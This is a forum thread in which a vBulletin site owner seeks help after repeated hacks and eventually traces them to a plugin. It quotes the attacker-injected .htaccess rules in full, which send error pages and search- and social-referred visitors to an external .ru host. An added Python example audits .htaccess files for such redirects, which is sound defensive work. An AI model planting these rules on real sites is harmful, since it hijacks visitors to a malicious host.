LOL I've Been Hacked, How Do I Patch Up

sapo

My site has been hacked.

They added a simple hidden iframe in the footer of my vBulletin forum, not for the first time. I usually just delete it and move on. But this time they attacked like crazy: they changed all my .htaccess files to some rewrite to some .ru site. I am asking how they can do this; I changed all my passwords, etc.

Well, better than how: how can I fix the holes in my site, or will I have to hire someone to go through it or something?
 
Make sure you have all the updates for plugins and CMS, strong passwords (and don't re-use them), don't leave uploading scripts that can get indexed or the default install directory and scripts, make sure your desktop has a proper firewall and antivirus, use secure transmission protocols over the network like SSH, use the best encryption for your wireless network (if it's the case). These are only some ideas I can think of at the moment.

The thing is that there are so many attack vectors out there and so many possibilities to get owned that you must be constantly vigilant and not let your guard down.

Even so, if the bad guys manage to get a foothold on a site hosted on the same server as yours, you can still get owned due to that weak link in the chain.
 
You need to find and patch the hole(s). I'd check your log files; it could be many things... hard to determine from the info you provided. Maybe restore from backup?
 
Fuck, I don't know what to do. Just got owned again; thought I fixed everything and shit. Site was only normal for about 5 minutes and bam, got hit again.
 
LOL and fucking HostGator is hilarious: said they can't help me till I remove all malware coding and get the "this site may cause harm" warning removed from Google before they can start to diagnose what is wrong. LMFAO, wtf is that.
 
'' LOL '' you've Been hacked?

lol

Well, it ain't actually funny, but after all these years of having sites I've never been hacked, and they do it to more of a hobby site than anything.

They keep changing my .htaccess to this:

Code:
ErrorDocument 400 http://aboutconvert.ru/kernel/index.php
ErrorDocument 401 http://aboutconvert.ru/kernel/index.php
ErrorDocument 403 http://aboutconvert.ru/kernel/index.php
ErrorDocument 404 http://aboutconvert.ru/kernel/index.php
ErrorDocument 500 http://aboutconvert.ru/kernel/index.php

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)
RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)
RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]
</IfModule>
 
Take a look at the encoding and filesize of the .htaccess files.

I don't know what it was or how it got in but I seem to have had some luck (so far, knock on wood) with deleting .htaccess files and writing new ones.

We'll see how long it lasts...
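
Added example, not part of the thread or any poster's code: one way to act on the advice to inspect the .htaccess files is to scan the webroot for the pattern quoted above, that is, ErrorDocument targets on another host and referer-conditioned redirects to another host, and to report each file's size. The function names and the placeholder host redirect.example are assumptions made for this example.

```python
import os
from urllib.parse import urlparse

# Constructed sample modelled on the rules quoted in the thread; redirect.example is a placeholder.
SAMPLE = """\
ErrorDocument 404 http://redirect.example/kernel/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\\.(.*)
RewriteRule ^(.*)$ http://redirect.example/kernel/index.php [R=301,L]
</IfModule>
"""

def external_host(target, own_hosts):
    host = urlparse(target).hostname  # None for local paths such as /404.html
    return host if host and host.lower() not in own_hosts else None

def audit_htaccess(text, own_hosts=()):
    """Return (line_no, kind, host) findings for one .htaccess body."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for n, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        target = parts[2] if len(parts) >= 3 else ""
        if name == "errordocument" and external_host(target, own):
            findings.append((n, "errordocument-external", external_host(target, own)))
        elif name == "rewritecond":
            referer_cond = referer_cond or "HTTP_REFERER" in raw.upper()
        elif name == "rewriterule":
            host = external_host(target, own)
            if host:
                kind = "referer-redirect" if referer_cond else "external-redirect"
                findings.append((n, kind, host))
            referer_cond = False  # conditions apply only to the next rule
    return findings

def scan_tree(root, own_hosts=()):
    """Map each .htaccess under root to (size_in_bytes, findings)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                report[path] = (os.path.getsize(path), audit_htaccess(fh.read(), own_hosts))
    return report
```

Pass the site's own hostnames as `own_hosts` so legitimate canonical-host redirects are not reported; a file whose size changes between runs deserves a second look even when it has no findings.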
 
Do you have all legal and paid for copies of the scripts/software you are using?
 
Yes I do. I have pinpointed where they are coming in from: it was a plugin, poorly written, or I guess good, but I was not using it on the version it was intended to be used on, so I disabled that directory and deleted the plugin. Changed all passwords, fixed all .htaccess files, and everything seems back to normal. Fucking 18 hours later, NO SLEEP, but it was worth it; I love this site.
 